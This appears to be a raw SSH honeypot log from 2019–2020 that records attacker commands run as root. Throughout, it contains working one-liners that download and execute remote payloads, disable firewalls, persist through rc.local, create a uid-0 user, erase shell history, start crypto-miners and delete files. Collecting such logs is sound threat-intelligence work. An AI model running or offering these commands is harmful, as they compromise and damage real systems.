Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.14.224.103/GoOgle.sh; chmod 777 GoOgle.sh; sh GoOgle.sh; tftp 45.14.224.103 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.14.224.103; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.14.224.103 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GoOgle.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.14.224.103/GoOgle.sh
chmod 777 GoOgle.sh
sh GoOgle.sh
tftp 45.14.224.103 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 45.14.224.103
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.14.224.103 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf GoOgle.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 51.116.180.98 29-Dec-2020 21:47:35 ssh2 root
Exec uname -a && lscpu
uname -a
lscpu

From 192.227.134.70 31-Dec-2020 16:38:39 ssh2 root
Exec cd /tmp || cd /; wget -q http://37.46.150.184/cometome; cat cometome > vegaiscoming; chmod +x vegaiscoming; ./vegaiscoming
cd /tmp || cd /
wget -q http://37.46.150.184/cometome
cat cometome > vegaiscoming
chmod +x vegaiscoming
./vegaiscoming

File: fakesshd-log-2019.txt


From 176.31.253.41 9-Jan-2019 08:31:00 ssh2 root
Exec uname -n -s -r -v && wget vaynz.000webhostapp.com/clima.pl && perl clima.pl && rm -rf clima.pl && wget vaynz.000webhostapp.com/xm.zip && unzip xm.zip && cd xm && chmod +x * && ./xmrig
uname -n -s -r -v && wget vaynz.000webhostapp.com/clima.pl

From 221.229.162.222 12-Jan-2019 09:16:20 ssh2 root
Exec ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=1987
ln -sf /usr/sbin/sshd /tmp/su
/tmp/su -oPort=1987
Exec ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=1987
ln -sf /usr/sbin/sshd /tmp/su
/tmp/su -oPort=1987

From 173.212.185.241 16-Jan-2019 14:57:26 ssh2 root
Exec uname -a && nproc && free -gt && uptime
uname -a && nproc && free -gt &&

From 212.129.145.70 18-Jan-2019 02:38:12 ssh2 root
Exec curl -o sass http://118.24.241.29:8745/sass
curl -o sass http://118.24.241.29:8745/sass

From 212.129.145.70 18-Jan-2019 02:38:16 ssh2 root
Exec curl -o sass http://118.24.241.29:8745/sass
curl -o sass http://118.24.241.29:8745/sass
Exec curl -o sass http://118.24.241.29:8745/sass
curl -o sass http://118.24.241.29:8745/sass

From 102.165.32.158 29-Jan-2019 01:05:36 ssh2 root
free
free -mt
uname -a
ls -al
ls -a
exit

From 216.119.142.123 29-Jan-2019 04:42:58 ssh2 root
Exec wget -e use_proxy=no -q -O - http://5.63.159.203/ptshell|sh && curl -fsSL http://5.63.159.203/ptshell|sh
wget -e use_proxy=no -q -O - http://5.63.159.203/ptshell|sh &&

From 162.243.142.143 29-Jan-2019 11:26:46 ssh2 root
Exec wget sudox.j4m.eu/info ; perl info
wget sudox.j4m.eu/info
perl info

From 188.32.211.54 31-Jan-2019 16:55:22 ssh2 root
Exec ps | grep '[Mm]iner'
ps | grep '[Mm]iner'

From 120.32.76.147 1-Feb-2019 17:45:51 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://45.127.97.4:8081/ls;chmod 777 ls;./ls;echo "cd /tmp/">>/etc/rc.local;echo "./ls&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://45.127.97.4:8081/ls
chmod 777 ls
./ls
echo "cd /tmp/">>/etc/rc.local
echo "./ls&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 86.120.151.211 3-Feb-2019 22:01:10 ssh2 root
w
perl
ls -a
yum install perl
reboot
exit

From 46.29.163.229 4-Feb-2019 20:37:18 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.98/wget.sh; curl -O http://185.244.25.98/wget.sh; chmod 777 wget.sh; sh wget.sh; tftp 185.244.25.98 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.244.25.98; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.244.25.98 ftp.sh ftp.sh; sh ftp.sh; rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt
wget http://185.244.25.98/wget.sh
curl -O http://185.244.25.98/wget.sh
chmod 777 wget.sh
sh wget.sh
tftp 185.244.25.98 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 185.244.25.98
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21
sh ftp.sh
rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh
rm -rf *

From 212.227.250.49 5-Feb-2019 03:44:35 ssh2 root
w
unset HISTFILE
cat /etc/passwd
perl
kill -9 -1

From 94.176.0.236 9-Feb-2019 14:21:26 ssh2 root
w
ls -all
nano .bash_history
cd
ifconfig
nproc
cat /proc/cpuinfo

From 94.176.0.236 9-Feb-2019 14:27:35 ssh2 root
ps x

From 94.176.0.236 9-Feb-2019 14:28:00 ssh2 root
cd
cd /var/tmp
ls
nano reglas.pl
yum
apt-get
apt-get install nanao
nano
apt-get nano

From 94.176.0.236 9-Feb-2019 14:30:10 ssh2 root
perl test.pl
cd
wget
apt-get install wget
wget
wget http://filmedesezon.com/slnt.tgz
tar xzvf slnt.tgz
rm -rf slnt.tgz
cd .v3
chmod +x *
./autorun

From 202.63.163.54 11-Feb-2019 00:24:32 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://45.127.97.4:8081/Linux-syn80;chmod 777 Linux-syn80;./Linux-syn80;echo "cd /tmp/">>/etc/rc.local;echo "./Linux-syn80&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://45.127.97.4:8081/Linux-syn80
chmod 777 Linux-syn80
./Linux-syn80
echo "cd /tmp/">>/etc/rc.local
echo "./Linux-syn80&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 157.230.238.201 15-Feb-2019 19:09:14 ssh2 root
Exec cd /tmp;wget http://206.189.75.54/.ipdb/fr.sh;chmod +x fr.sh;./fr.sh;rm -rf fr.sh
cd /tmp
wget http://206.189.75.54/.ipdb/fr.sh
chmod +x fr.sh
./fr.sh
rm -rf fr.sh

From 139.9.31.42 17-Feb-2019 00:01:57 ssh2 root
Exec uname -n -s -r -v 
uname -n -s -r -v

From 74.205.162.240 21-Feb-2019 15:14:57 ssh2 root
unset HISTFILE HISTSAVE HISTLOG SCREEN WATCH
w
ls- alF
ls -alF
cat .bash_His
cat .bash_his
cat .bash_history
nano .bash_history
w
id
uname -
cat /etc/issue
uname -a
cat /etc/issue ps -aux
clear
netstat -taupn
ps x
nproc
cat /proc/cpuinfo
df -h
cat /etc/hosts

From 202.70.66.228 3-Mar-2019 23:34:51 ssh2 root
Exec uname -a && lscpu 
uname -a && lscpu

From 188.24.126.108 5-Mar-2019 23:57:08 ssh2 root
ls
w
clear
nproc
ifconfig
clear
wget portocala.cf/info
-c
y
[-Y]--proxy /off
-bash
perl test.pl
test.pl
nano test.pl

From 188.24.126.108 6-Mar-2019 00:01:14 ssh2 root
sudo su

From 188.24.126.108 6-Mar-2019 00:03:09 ssh2 root
Exec test -x /usr/lib/sftp-server && exec /usr/lib/sftp-server
test -x /usr/local/lib/sftp-server && exec /usr/local/lib/sftp-server
exec sftp-server
test -x /usr/lib/sftp-server && exec /usr/lib/sftp-server test -x

From 188.24.126.108 6-Mar-2019 00:03:16 ssh2 root
Exec test -x /usr/lib/sftp-server && exec /usr/lib/sftp-server
test -x /usr/local/lib/sftp-server && exec /usr/local/lib/sftp-server
exec sftp-server
test -x /usr/lib/sftp-server && exec /usr/lib/sftp-server test -x
exit

From 51.77.212.179 9-Mar-2019 19:47:59 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 112.65.53.201 26-Mar-2019 20:20:03 ssh2 root
killall .sshd yam wipefs 100 pythno 118 python
rm -rf /tmp/118 /etc/crond
wget -O /tmp/118 http://118.193.156.79:222/118 chmod +x /tmp/118 /tmp/118
wget -O /tmp/118 http://118.193.156.79:222/118

From 51.38.239.192 1-Apr-2019 00:01:01 ssh2 root
Exec uname -n -s -r -v ;curl -s -O meliodasnr1.000webhostapp.com/.abc/bot.pl ;perl bot.pl ;perl bot.pl ;perl bot.pl ;rm -rf bot.pl ;history -c
uname -n -s -r -v
curl -s -O meliodasnr1.000webhostapp.com/.abc/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 86.120.74.18 11-Apr-2019 16:53:06 ssh2 root
w
useradd -ou 0 -g 0 user
uname -a
useradd
adduser
ps x
ls -a
cd .ssh
ls -a
cd
cd /var/tmp
ls -a
cat /proc/cpuinfo
passwd

From 86.120.74.18 11-Apr-2019 16:55:44 ssh2 root
cat issue
cd

From 86.120.74.18 11-Apr-2019 16:56:07 ssh2 root
wget
ifconfig
cd /var/tmp
wget nasapaul.com/cnrig
curl
apt
wget -q
passwd
cd
ls -a
cat .bash_history
./test.pl

From 54.37.30.240 12-Apr-2019 11:25:28 ssh2 root
Exec (curl -fsSL http://yxarsh.shop/3.jpg||wget -q -O- http://yxarsh.shop/3.jpg)|bash -sh
(curl -fsSL http://yxarsh.shop/3.jpg||wget -q -O- http://yxarsh.shop/3.jpg)|bash -sh

From 31.30.120.136 13-Apr-2019 01:38:59 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl [kswapd9] [kworker] [rcu_scheds] [kaudit] [watchd0g] [khelper0] [kacpuid] [zftpd] [crond] [udevd] [khelp] [sync_s] [rpcbind] rsync;cd /tmp;wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/yc;perl yc;rm -rf yc*;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl [kswapd9] [kworker] [rcu_scheds] [kaudit] [watchd0g]
cd /tmp
wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f
perl yc
rm -rf yc*

From 123.170.99.51 14-Apr-2019 15:31:16 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.133.152:8080/csa;chmod 777 csa;./csa;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.133.152:8080/csa
chmod 777 csa
./csa

From 87.216.162.64 15-Apr-2019 05:28:05 ssh2 root
Exec uname -a; cd /tmp ; wget http://arhive.altervista.org/n.pl ; perl n.pl
uname -a
cd /tmp
wget http://arhive.altervista.org/n.pl
perl n.pl

From 86.127.10.144 18-Apr-2019 21:24:13 ssh2 root
w
perl
ls -a
exit

From 31.30.120.136 19-Apr-2019 18:34:30 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl [kswapd9] [kworker] [rcu_scheds] [kaudit] [watchd0g] [khelper0] [kacpuid] [zftpd] [crond] [udevd] [khelp] [sync_s] [rpcbind] rsync;cd /tmp;rm -rf yc;wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/yc;perl yc;perl yc;rm -rf yc*;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl [kswapd9] [kworker] [rcu_scheds] [kaudit] [watchd0g]
cd /tmp
rm -rf yc
wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f
perl yc
rm -rf yc*

From 79.137.174.247 20-Apr-2019 23:40:49 ssh2 root
Exec uname -a && lscpu
uname -a && lscpu

From 129.213.137.213 22-Apr-2019 04:17:12 ssh2 root
Exec uname -a & lscpu
uname -a & lscpu

From 31.30.120.136 22-Apr-2019 18:39:08 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl [kswapd9] [kworker] [rcu_scheds] [kaudit] [watchd0g] [khelper0] [kacpuid] [zftpd] [crond] [udevd] [khelp] [sync_s] [rpcbind];cd /tmp;rm -rf yc;wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/yc;perl yc;rm -rf yc*;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl [kswapd9] [kworker] [rcu_scheds] [kaudit] [watchd0g]
cd /tmp
rm -rf yc
wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f
perl yc
rm -rf yc*

From 31.30.120.136 27-Apr-2019 04:00:03 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf yc;wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/yc;perl yc;rm -rf yc*;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf yc
wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f
perl yc
rm -rf yc*

From 167.114.231.178 27-Apr-2019 07:36:31 ssh2 root
Exec (curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>
1
Exec (curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>
1
Exec (curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>
1
Exec (curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>
1
Exec (curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>
1
Exec (curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>
1
Exec (curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>
1

From 167.114.231.178 27-Apr-2019 07:40:58 ssh2 root
Exec (curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>
1
Exec (curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>
1

From 167.114.231.178 27-Apr-2019 07:41:10 ssh2 root
Exec (curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/60T3uCcb||wget -q -O- https://pastebin.com/raw/60T3uCcb)|sh >/dev/null 2>
1

From 188.248.36.142 27-Apr-2019 13:12:09 ssh2 root
ls
znc
ifconfig
ls -a
ps x
get

From 205.252.40.168 1-May-2019 12:26:11 ssh2 root
Exec uname -a;php -v;
uname -a
php -v

From 31.30.120.136 2-May-2019 01:40:38 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl [kswapd9] [kworker] [rcu_scheds] [kaudit] [watchd0g] [khelper0] [kacpuid] [zftpd] [crond] [udevd] [khelp] [sync_s] [rpcbind] rsync ircu super_z [pcu] [rcu_scheds] [kwin] [khelper0] [kacpuid] [tfpd] [crop] [udevd] [kh0] [sync_t] [rpc_bind];cd /var/tmp;cd /tmp;rm -rf yc;wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/yc && perl yc && rm -rf yc*;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl [kswapd9] [kworker] [rcu_scheds] [kaudit] [watchd0g]
cd /var/tmp
cd /tmp
rm -rf yc
wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f

From 183.253.7.167 3-May-2019 14:30:50 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://112.3.28.155:8080/LinuxTF;chmod 777 LinuxTF;./LinuxTF;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://112.3.28.155:8080/LinuxTF
chmod 777 LinuxTF
./LinuxTF

From 37.187.74.146 3-May-2019 19:37:19 ssh2 root
w
uname -a
ls -a
cat .bash_history
cd .ssh
ls
ls -a
df -h
wget
nproc
lscpu
cat /proc/cpuinfo
wget -O /dev/null http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
id
cd /tmp
ls -a
exit

From 113.65.27.247 4-May-2019 04:08:25 ssh2 root
yum -y install wget wget -N --no-check-certificate https://raw.githubusercontent.com/ToyoDAdoubi/doubi/master/ssr.sh
chmod +x ssr.sh
bash ssr.sh
wget -N --no-check-certificate https://raw.githubusercontent.com/ToyoDAdoubi/doubi/master/ssr.sh
chmod +x ssr.sh
bash ssr.sh
yum -y install wget
wget -N --no-check-certificate https://raw.githubusercontent.com/ToyoDAdoubi/doubi/master/ssr.sh
chmod +x ssr.sh
bash <(curl -s -L https://233blog.com/v2ray.sh)
apt-get update -y
apt-get install curl -y
bash <(curl -s -L https://233blog.com/v2ray.sh)
yum update -y
yum install curl -y

From 31.30.120.136 5-May-2019 14:31:02 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 [kswapd9];killall -9 [kworker];killall -9 [rcu_scheds];killall -9 [kaudit];killall -9 [watchd0g];killall -9 [khelper0];killall -9 [kacpuid];killall -9 [zftpd];killall -9 [crond];killall -9 [udevd];killall -9 [khelp];killall -9 [sync_s];killall -9 [rpcbind];killall -9 rsync;killall -9 ircu;killall -9 super_z;killall -9 [pcu];killall -9 [rcu_scheds];killall -9 [kwin];killall -9 [khelper0];killall -9 [kacpuid];killall -9 [tfpd];killall -9 [crop];killall -9 [udevd];killall -9 [kh0];killall -9 [sync_t];killall -9 [rpc_bind];cd /tmp;rm -rf yc;wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/yc;chmod +x yc;./yc;rm -rf yc .a;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 [kswapd9]
killall -9 [kworker]
killall -9 [rcu_scheds]
killall -9 [kaudit]
killall -9 [watchd0g]
killall -9 [khelper0]
killall -9 [kacpuid]
killall -9 [zftpd]
killall -9 [crond]
killall -9 [udevd]
killall -9 [khelp]
killall -9 [sync_s]
killall -9 [rpcbind]
killall -9 rsync
killall -9 ircu
killall -9 super_z
killall -9 [pcu]
killall -9 [rcu_scheds]
killall -9 [kwin]
killall -9 [khelper0]
killall -9 [kacpuid]
killall -9 [tfpd]
killall -9 [crop]
killall -9 [udevd]
killall -9 [kh0]
killall -9 [sync_t]
killall -9 [rpc_bind]
cd /tmp
rm -rf yc
wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/yc
chmod +x yc
./yc
rm -rf yc .a

From 31.30.120.136 6-May-2019 01:58:02 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 [kswapd9];killall -9 [kworker];killall -9 [rcu_scheds];killall -9 [kaudit];killall -9 [watchd0g];killall -9 [khelper0];killall -9 [kacpuid];killall -9 [zftpd];killall -9 [crond];killall -9 [udevd];killall -9 [khelp];killall -9 [sync_s];killall -9 [rpcbind];killall -9 rsync;killall -9 ircu;killall -9 super_z;killall -9 [pcu];killall -9 [rcu_scheds];killall -9 [kwin];killall -9 [khelper0];killall -9 [kacpuid];killall -9 [tfpd];killall -9 [crop];killall -9 [udevd];killall -9 [kh0];killall -9 [sync_t];killall -9 [rpc_bind];cd /tmp;rm -rf yc;wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/yc;chmod +x yc;./yc;rm -rf yc .a;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 [kswapd9]
killall -9 [kworker]
killall -9 [rcu_scheds]
killall -9 [kaudit]
killall -9 [watchd0g]
killall -9 [khelper0]
killall -9 [kacpuid]
killall -9 [zftpd]
killall -9 [crond]
killall -9 [udevd]
killall -9 [khelp]
killall -9 [sync_s]
killall -9 [rpcbind]
killall -9 rsync
killall -9 ircu
killall -9 super_z
killall -9 [pcu]
killall -9 [rcu_scheds]
killall -9 [kwin]
killall -9 [khelper0]
killall -9 [kacpuid]
killall -9 [tfpd]
killall -9 [crop]
killall -9 [udevd]
killall -9 [kh0]
killall -9 [sync_t]
killall -9 [rpc_bind]
cd /tmp
rm -rf yc
wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f
chmod +x yc
./yc
rm -rf yc .a

From 183.253.24.87 12-May-2019 01:27:32 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://112.3.28.155:8090/32;chmod 777 32;./32;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://112.3.28.155:8090/32
chmod 777 32
./32

From 125.115.251.46 12-May-2019 02:17:07 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://132.232.61.21:3456/szx;chmod 777 szx;./szx;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://132.232.61.21:3456/szx
chmod 777 szx
./szx

From 183.253.24.87 12-May-2019 03:38:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://112.3.28.155:8090/LinuxTF;chmod 777 LinuxTF;./LinuxTF;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://112.3.28.155:8090/LinuxTF
chmod 777 LinuxTF
./LinuxTF

From 43.249.192.59 12-May-2019 04:24:20 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://156.236.116.94:7777/pprt;chmod 777 pprt;./pprt;chattr +i /tmp/pprt;echo "cd /tmp/">>/etc/rc.local;echo "./pprt&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://156.236.116.94:7777/pprt
chmod 777 pprt
./pprt
chattr +i /tmp/pprt
echo "cd /tmp/">>/etc/rc.local
echo "./pprt
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 125.115.251.46 12-May-2019 05:50:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://132.232.61.21:3456/udp25000;chmod 777 udp25000;./udp25000;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://132.232.61.21:3456/udp25000
chmod 777 udp25000
./udp25000

From 117.152.186.51 12-May-2019 08:40:59 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://120.27.195.78:280/Linux2.6;chmod 777 Linux2.6;./Linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://120.27.195.78:280/Linux2.6
chmod 777 Linux2.6
./Linux2.6

From 43.249.192.59 12-May-2019 09:06:27 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://156.236.116.94:7777/ppol;chmod 777 ppol;./ppol;chattr +i /tmp/ppol;echo "cd /tmp/">>/etc/rc.local;echo "./ppol&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://156.236.116.94:7777/ppol
chmod 777 ppol
./ppol
chattr +i /tmp/ppol
echo "cd /tmp/">>/etc/rc.local
echo "./ppol
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 183.253.24.87 12-May-2019 11:02:48 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://112.3.28.155:8090/.64;chmod 777 .64;./.64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://112.3.28.155:8090/.64
chmod 777 .64
./.64

From 43.249.192.59 12-May-2019 23:18:08 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://43.249.192.59:7777/aliyun.6.6;chmod 777 aliyun.6;./aliyun.6;chattr +i /tmp/aliyun.6;echo "cd /tmp/">>/etc/rc.local;echo "./aliyun.6&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://43.249.192.59:7777/aliyun.6.6
chmod 777 aliyun.6
./aliyun.6
